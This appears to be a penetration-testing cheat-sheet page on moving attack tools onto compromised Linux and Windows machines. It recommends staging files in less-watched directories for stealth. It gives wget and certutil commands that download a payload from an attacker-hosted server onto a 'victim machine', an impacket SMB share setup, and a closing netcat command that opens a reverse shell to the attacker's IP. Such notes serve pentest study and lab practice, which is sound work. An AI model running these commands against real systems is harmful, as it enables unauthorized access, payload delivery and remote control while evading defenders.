File Transfer
Where to Transfer
On Linux, transfer files to
/dev/shm
On Windows, transfer files to
C:\Windows\Tasks
They are chosen to be the locations for file transfer because they are world-readable/writable/executable and more stealthy than /tmp
and C:\Windows\Temp
.
Linux
On attack machine, host a server:
updog
On victim machine, download with wget
:
wget http://<local_ip>/linpeas.sh
Windows
certutil
On attack machine, host a server:
updog
On victim machine, download with certutil
:
certutil -urlcache -f http://<local_ip>/payload.exe payload.exe
impacket-smbserver
If certutil
is not on the compromised Windows machine, we can transfer files with SMB server instead.
On Kali, create a SMB server:
impacket-smbserver ret2basic /usr/share/windows-resources/binaries/
Here ret2basic
is the name of the share and /usr/share/windows-resources/binaries/
is the directory that I want to host. On the compromised Windows machine:
net use * \\<local_ip>\ret2basic
Z:\nc.exe <local_ip> <local_port> -e cmd
Last updated
Was this helpful?